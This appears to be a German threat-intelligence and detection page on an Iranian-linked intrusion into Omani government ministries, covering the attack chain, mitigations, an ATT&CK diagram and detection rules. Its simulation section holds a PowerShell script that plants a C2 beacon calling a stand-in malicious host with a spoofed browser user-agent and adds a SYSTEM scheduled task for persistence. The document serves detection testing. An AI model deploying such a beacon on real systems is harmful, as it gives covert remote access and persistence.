Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein iranischer Bedrohungsakteur mit staatlicher Unterstützung kompromittierte mehrere Regierungsministerien im Oman, indem er Webshells, ProxyShell-Exploits und eine benutzerdefinierte Command-and-Control-Umgebung verwendete, die auf einem in den VAE ansässigen VPS gehostet wurde. Die Angreifer exfiltrierten mehr als 26.000 Benutzerdatensätze und Registrierungsdatenbanken und setzten anschließend nachfolgende Kompromittierungstools wie Chisel und GodPotato ein, um den Zugriff zu vertiefen. Der Betrieb wurde weiter enttarnt durch ein offenes Verzeichnis, das unabsichtlich die Werkzeuge, Skripte und C2-Protokolle der Angreifer offenbarte und Einblicke in den vollständigen Einbruchsablauf bot.
Untersuchung
Forscher griffen auf den exponierten VPS zu unter 172.86.76.127 und identifizierten Webshells, Python-basierte Command-and-Control-Skripte, Tools zur Privilegieneskalation und mehrere Exploit-Skripte, die auf ProxyShell und die DNN SSRF-Schwachstelle abzielten. Netzwerkprotokolle zeigten Beaconing-Aktivitäten über die Ports 8001 and 8002, sowie die Nutzung von Chisel-Tunneln für verdeckten Zugang. Die Untersuchung dokumentierte auch die Erstellung geplanter Aufgaben, die Extraktion von Registrierungsdatenbanken und großflächige Datenabzüge von kompromittierten Systemen.
Minderung
Organisationen sollten alle Patches im Zusammenhang mit ProxyShell in Microsoft Exchange anwenden und das DNN SSRF-Problem, das als CVE-2025-32372nachverfolgt wird, beheben. Webanwendungen sollten gehärtet werden, IIS-Konten sollten mit minimalen Rechten ausgeführt werden, und nicht verwendete ASP.NET -Seiten sollten wo immer möglich deaktiviert werden. Verteidiger sollten auch Webanwendungs-Firewalls einsetzen, ausgehenden Datenverkehr über ungewöhnliche Ports überwachen und regelmäßig internetzugängliche Server auf verlassene oder exponierte Verzeichnisse überprüfen.
Reaktion
Sicherheitsteams sollten Erkennungen für Webshell-Zugriffsmuster, PowerShell-Beaconing-Verhalten, Chisel-Tunnel-Aktivitäten und verdächtige geplante Aufgaben erstellen. Vorfallresponder sollten Webserver-Protokolle, Registrierungsdatenbanken und jegliche Datenbankabzüge für forensische Analysen sammeln. Betroffene Systeme sollten isoliert, Anmeldedaten ausgetauscht und die entsprechenden omanischen Behörden oder Stakeholder sofort benachrichtigt werden.
"graph TB %% Klassendefinitionen Abschnitt classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Knotendefinitionen – Techniken initial_access["<b>Technik</b> – <b>T1190 Öffentliche Anwendungs-Exploitation</b><br/>Methode: ProxyShell & DNN SSRF"] class initial_access technique remote_services["<b>Technik</b> – <b>T1210 Ausbeutung von Fernzugriffsdiensten</b><br/>Laterale Bewegung"] class remote_services technique web_shell["<b>Technik</b> – <b>T1505.003 Web Shell</b><br/>Bereitgestellt: hc2.aspx / health_check_t.aspx"] class web_shell technique c2_bidir["<b>Technik</b> – <b>T1102.002 Webservice-Bidirektionale Kommunikation</b><br/>HTTP C2 Server"] class c2_bidir technique tunneling["<b>Technik</b> – <b>T1572 Protokoll-Tunneling</b> & <b>T1219.001 IDE-Tunneling</b><br/>Tool: Chisel"] class tunneling technique weaken_enc["<b>Technik</b> – <b>T1600 Verschlüsselung Schwächen</b><br/>Angewandt auf Tunnel"] class weaken_enc technique priv_esc["<b>Technik</b> – <b>T1134.003 Zugriffstoken-Manipulation</b> & <b>T1068 Ausbeutung zur Privilegieneskalation</b><br/>Tool: GodPotato"] class priv_esc technique account_manip["<b>Technik</b> – <b>T1098 Konto-Manipulation</b><br/>Erhöhte Rechte aufrechterhalten"] class account_manip technique cred_access["<b>Technik</b> – <b>T1012 Abfrage des Registers</b><br/>SAM/System Datenbanken stehlen"] class cred_access technique def_evasion["<b>Technik</b> – <b>T1562 Verteidigungen Beeinträchtigen</b> & <b>T1668 Exklusive Kontrolle</b><br/>AV deaktivieren"] class def_evasion technique discovery["<b>Technik</b> – <b>T1592.002 Informationen über Opferhost sammeln</b> & <b>T1590.001 Netzwerktopologiedaten erheben</b>"] class discovery technique exfiltration["<b>Technik</b> – <b>T1041 Exfiltration über C2-Kanal</b> & <b>T1030 Datenübertragungsgrößenkontrollen</b>"] class exfiltration technique oneway["<b>Technik</b> – <b>T1102.003 Einweg-Webdienst-Kommunikation</b><br/>Ergebniseinstellung"] class oneway technique %% Knotendefinitionen – Werkzeuge / Malware tool_proxyshell["<b>Werkzeug</b> – <b>Name</b>: ProxyShell<br/><b>Zweck</b>: Exchange Server Ausbeuten"] class tool_proxyshell tool tool_chisel["<b>Werkzeug</b> – <b>Name</b>: Chisel<br/><b>Zweck</b>: Tunneling"] class tool_chisel tool tool_godpotato["<b>Werkzeug</b> – <b>Name</b>: GodPotato<br/><b>Zweck</b>: Privilegieneskalation"] class tool_godpotato tool %% Verbindungen – Angriffsfluss initial_access –>|führt_zu| remote_services initial_access –>|verwendet| tool_proxyshell remote_services –>|führt_zu| web_shell web_shell –>|ermöglicht| c2_bidir c2_bidir –>|verwendet| tunneling tunneling –>|verwendet| tool_chisel tunneling –>|ermöglicht| weaken_enc weaken_enc –>|ermöglicht| priv_esc priv_esc –>|verwendet| tool_godpotato priv_esc –>|ermöglicht| account_manip account_manip –>|ermöglicht| cred_access cred_access –>|ermöglicht| def_evasion def_evasion –>|ermöglicht| discovery discovery –>|ermöglicht| exfiltration exfiltration –>|verwendet| oneway "
Angriffsfluss
Erkennungen
Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (via cmdline)
Anzeigen
Download oder Upload via Powershell (via cmdline)
Anzeigen
Mögliche Konto- oder Gruppenzählung / Manipulation (via cmdline)
Anzeigen
LOLBAS Schtasks (via cmdline)
Anzeigen
IOCs (HashSha256) zur Erkennung: Iranische-Nexus-Operation gegen die Regierung von Oman: 12 Ministerien angegriffen und 26.000 Bürgerdatensätze offengelegt
Anzeigen
IOCs (SourceIP) zur Erkennung: Iranische-Nexus-Operation gegen die Regierung von Oman: 12 Ministerien angegriffen und 26.000 Bürgerdatensätze offengelegt
Anzeigen
IOCs (DestinationIP) zur Erkennung: Iranische-Nexus-Operation gegen die Regierung von Oman: 12 Ministerien angegriffen und 26.000 Bürgerdatensätze offengelegt
Anzeigen
Erkennung von hc2.aspx und health_check_t.aspx Webshells und ProxyShell-Ausbeutung [Webserver]
Anzeigen
Erkennung von PowerShell-Befehlspolling und Exfiltration über gefälschten Chrome User-Agent [Windows Powershell]
Anzeigen
Simulation der Ausführung
Voraussetzung: Die Telemetrie- & Basislinien-Vorflugprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zum Auslösen der Erkennungsregel entwickelt wurde. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffs-Narrativ und Befehle:
Der Angreifer hat bereits einen Fuß auf der Opfersystem erlangt und möchte ein leises C2-Beacon etablieren. Sie platzieren das PowerShell-Skript new_beacon.ps1 ins AppData-Verzeichnis des Benutzers. Das Skript läuft in einer Endlosschleife und pollt alle 30 Sekunden ein Remote-C2. Jede HTTP-Anfrage wird mit einem Chrome UA-String erstellt, um sich in den normalen Webdatenverkehr einzufügen und so netzwerkbasierte Erkennungen zu umgehen (T1217, T1674). Der Angreifer startet das Beacon über eine geplante Aufgabe, um die Persistenz sicherzustellen (T1204.004). -
Regression-Test-Skript:
# ------------------------------------------------- # Bereitstellen und starten des neuen_beacon PowerShell-Beacons # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" $c2Url = "http://malicious.example.com/beacon" # 1. Schreiben des Beacon-Skripts (simulierte schlanke Version) $scriptContent = @' while ($true) { $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/118.0.5993.90 Safari/537.36" } try { Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null } catch {} Start-Sleep -Seconds 30 } '@ Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8 # 2. Registrierung einer geplanten Aufgabe für die Persistenz (läuft jede Minute) $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`"" $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue) $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force Write-Host "Beacon bereitgestellt und geplante Aufgabe erstellt." -
Bereinigungskommandos:
# ------------------------------------------------- # Entfernen des Beacons und der geplanten Aufgabe # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue Write-Host "Bereinigung abgeschlossen."